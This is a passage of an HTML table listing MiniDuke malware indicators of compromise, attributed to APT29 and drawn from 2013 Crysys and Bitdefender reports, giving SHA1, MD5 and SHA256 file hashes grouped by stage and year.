<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73366C1EB26B92886531586728BE4975D56F7CA5</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c92252487615d5379317febc22dba7d4</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">7f5d3a8dfa13ba8e2142a3b1d644f107cc89c7e90cda2a5543df5787f8bfde1e</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">81612FC09CFAE280CC35B1331C832A5A87C2EDFF</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">afe0190820b3edc296daefe6d1611051</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">63eebf042547a7549fe9f5affaa1cee6bf11cf0450ede8f42e13bf4656e2f9b0</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">827DE388E0FEABD92FE7BD433138AA35142BD01A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2ab25d33d61cf4cfbac92c26c7c0598e</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6a95d2895362fc8657bc90d73d77e32f09b86699eb625905ddeb45ccd6b13c71</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A32817E9FF07BC69974221D9B7A9B980FA80B677</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1528567b1a2f1da31d602ce1ddfd8918</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d457e4189017712917c5c8f900bb9072c5910c9f975c50337115f952d885635</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A6C18FCBE6B25C370E1305D523B5DE662172875B</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b68677e04fcc9103560bb0a5e5c7303f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">94d39845ec228ff1c84668207c4591ae0e2b6605bdf11e84916534ab09744736</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">A9E529C7B04A99019DD31C3C0D7F576E1BBD0970</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">d2f39019bfa05c7e71748d0624be9a94</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">19580f275b82ee091bdc3028e6e5018fdcc915fe7853d4151b44f3d7e101e531</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">AD9734B05973A0A0F1D34A32CD1936E66898C034</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a58e8e935341b6f5cc1369c616de3765</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5b96b07528f762dfcb9d6936995ed4e358d29542ae756f6e5547fa3b5b7797b6</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">C39D0B12BB1C25CF46A5AE6B197A59F8EA90CAA0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2d87ab160291664d62445548a2164c60</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">23486eedb5fe8a026f602507f490b4df4721e8befa65007b84c4f5b1ed95e1bd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">CC492D4B188F4CF5003F8B6954F6DD071A8066C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">06def6c642dcbd58d0291ac110a57274</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3c28d41fbe5f6f0e4a8402fdd036f2a8cf271dabe135919ea0de0d5f1348f871</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D81B0705D26390EB82188C03644786DD6F1A2A9E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f19345e0e5aecc0da45b4c110591bdd9</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b55e6e10a7f46c97cd247028287ea664bacf7ec7e500a4bf4f53c9dea7625426</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ED64FBA3195F52192C65CAD491A28BF18F6F67A3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">92a2c993b7a1849f11e8a95defacd2f7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">5de532fd62bd4e528ed6e0ccf746e20e2e58041b7ff5327ddbbcf37628429077</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EDF74413A6E2763147184B5E1B8732537A854365</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8282eb6d6f20c5de6e7f4ae3a42438d2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">fe2672737205351df003e1969ef1ef0df9e13a9a31bf77f844236857ed0b0bf5</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">EFCB9BE7BF162980187237BCB50F4DA2D55430C2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">935892bb70d954efdc5ee1b0c5f97184</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a962ea9027514712ba3949dc3ca54559d1d42e116837dda5f9809d6523a41255</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">F62600984C5086F2DA3D70BC1F5042CF464F928D</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">381691b297f7f5694709e21ad61ec645</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">13a50942322977d6471f71debc6d3db38807d88778366bae6cfcae45823a17f8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-02_Crysys_Miniduke Indicators</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">00852745CB40730DC333124549A768B471DFF4BC</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">cf59ed2b5473281cc2e083eba3f4b662</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">3d0b1f970eaeeabf9372ffc1ad7e61226632904cf0311ea8f872ddbfd34a3a2a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">0E263D80C46D5A538115F71E077A6175168ABC5C</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">78e51be60eab2c6e952c9538a46ab521</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">05e4224d4dd4e5fbd381ed33edb5bf847fbc138fbe9f57cb7d1f8fc9fa9a382d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">118114446847EAD7A2FE87ECB4943FDBDD2BBD1E</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4c6608203e751cf27f627220269d6835</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">29ad305cba186c07cedc1f633c09b9b0171289301e1d4319a1d76d0513a6ac50</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">15C75472F160F082F6905D57A98DE94C026E2C56</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">738c60fff066934b6f33e368cfe9a88c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">de8184c6850d17f90e861309828af1f7b7e3b1695ebe5d303d3d4b6ef4ba1218</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1DF9B4DC693CE7250F51CBC7CED53AD0A6E1C587</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c48d0822eedd75c9c56f688fb8a05259</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">79bc1595ad701ab8a72874a96bcfb94986daeee26b996241e691f3d53f7ec53a</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">416D1035168B99CC8BA7227D4C7C3C6BC1CE169A</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">811f66d6dd2c713073c0b0aebbe74ce8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">4809c2c7fa19acfa011f97946205f979afb54ac2c166f48ab35a20cd9d53a2ca</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">493D0660C9CF738BE08209BFD56351D4CF075877</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">86ef8f5f62ae8590d6edf45e04806515</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a6e2852f2e6701656da74adb412cd0850b0d27750803613223be3eb5ac5cc26c</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">497F9C688ED142AE91E354B3D9C9E13243A268B0</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">626489f8cafacb1b24fe6ecf0db52f23</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">163eda7f8382b3981e23d81318505806260d2657ca3cd9d7e0995299a5647318</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6CF8CA847EE317255A9084BB44AE3F38EF61E5C3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">92ff4df1d079a003ae2a8ac47dd5e81b</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f4698d9429b004357d1008ea8c9b94ec2a0370900616165db2315a9cbdda28fd</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">804701959A1DBFBBFC6D8142DE850DB9FCE9A611</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">07a9975d7d96ff3b56de024ab2017582</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">684f863b5af69ef3dc4e86a54cbb1f5486adfe79e08bd0b12d89684c0a9fb2fe</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9D716D2F8F1C2841A2707EBA2EBADD01ED830030</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">44ee71de720fc1a50c919bc5a01c592d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">a982838c4e90db3cb331f1d2f7b5b74f389da64e642bda75335a6137fdd627d8</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">D22D80DA6F042C4DA3392A69C713EE4D64BE8BC8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b798c968cbfd53f878e13c7698610d9c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">12a057ca7c92cda3cd0e09efc5bff2ebd3f7d2991e999038c7f31a6ac6a95c3d</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">Stage3</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">E4ADD0B118113B2627143C7EF1D5B1327DE395F1</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">18e64b8e5ce5bdd33ce8bd9e00af672c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">b1584a6f1059ad1c24bde2a9a8ae83ffc6679eb531d30f3f1c69f81e3a3819dc</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-04_Bitdefender_A Closer Look at MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-04_Bitdefender_A Closer Look at MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2011</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2011</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">_2011</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1c658719e6dedb929a6d85359c59682d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">91b97f3b8ef8ebc8bbd06e06927e7b38090c026f8fca77e209e69c056b042cb7</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">APT29_2013-04_Bitdefender_A Closer Look at MiniDuke</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">15101f74f974e3e80cc37805ebe5cc2efed77bb5745d82e1b44b1da4f0c83691</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">73931351f883cff5dbdcc54cc4eb10a7</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">15101f74f974e3e80cc37805ebe5cc2efed77bb5745d82e1b44b1da4f0c83691</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1db9187b7b0e5bc97aca233f29b96295c0bc4058fdcff50df543c1f044e58836</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1de51ec5d2b8466f0d424e1c8dcd6454</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">1db9187b7b0e5bc97aca233f29b96295c0bc4058fdcff50df543c1f044e58836</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2f9834f7b7fe09d98ef7b27d3828691ed4b361d1ccbbf8e10703f9ec03b05259</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">612fba96383a5098c26fe1a222e1e755</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2f9834f7b7fe09d98ef7b27d3828691ed4b361d1ccbbf8e10703f9ec03b05259</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">415f88765b88dd90e5b0502e4fa1408e06ac9552c7c8974a510e6e23a9756a45</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e48fb57ce3d9c56ca3cf6c4aed8ad0ea</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">415f88765b88dd90e5b0502e4fa1408e06ac9552c7c8974a510e6e23a9756a45</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55129d34050b2c028de564e3166611e1d148c26de0972cbe047caf530f118468</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">74593127f50abff5327b3f7038b456d2</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">55129d34050b2c028de564e3166611e1d148c26de0972cbe047caf530f118468</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6e57c69963562d28a3a9da9f9103c199c909d0baa185a5d21e1b200a5a14ab72</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">9f13dc03904dbd45374acc2134477273</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">6e57c69963562d28a3a9da9f9103c199c909d0baa185a5d21e1b200a5a14ab72</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bf210e54c65ea69ebda418f701c2c6b8aff840f31c1072d641a726cef8c7b5ad</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ded2f80457aaefe1a80a9cefd1f4645d</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">bf210e54c65ea69ebda418f701c2c6b8aff840f31c1072d641a726cef8c7b5ad</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c13794601c5bdec3d5d76de9571e6c0e0b022b9fc62907018566895e3b949982</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">423bb8914078a587d08b54d16bbd527c</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">c13794601c5bdec3d5d76de9571e6c0e0b022b9fc62907018566895e3b949982</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dfe146fffd2ae59172f52048f7e7d231807e0d732e19bdb443820a8305165741</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">561017f887865b8d13f85c5474cdcbb8</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">dfe146fffd2ae59172f52048f7e7d231807e0d732e19bdb443820a8305165741</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e961202d84aad7fa9faaeb63651735416612d25c611a7a025e2eaab67c79e272</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">ff83dad77ac2b526849930f1860dfd3f</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">e961202d84aad7fa9faaeb63651735416612d25c611a7a025e2eaab67c79e272</span></td></tr>
<tr><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">2012</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f151f5a656d43a76a07fa03166906d51f9683b27b0e9b86464e3a68e9dba1fac</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">8d3542af992b1de4cf1f587f61dddb50</span></td><td style="border: 1px solid rgb(204, 204, 204); margin: 3px; padding: 4px;"><span style="font-family: inherit; font-size: x-small;">f151f5a656d43a76a07fa03166906d51f9683b27b0e9b86464e3a68e9dba1fac</span></td></tr>
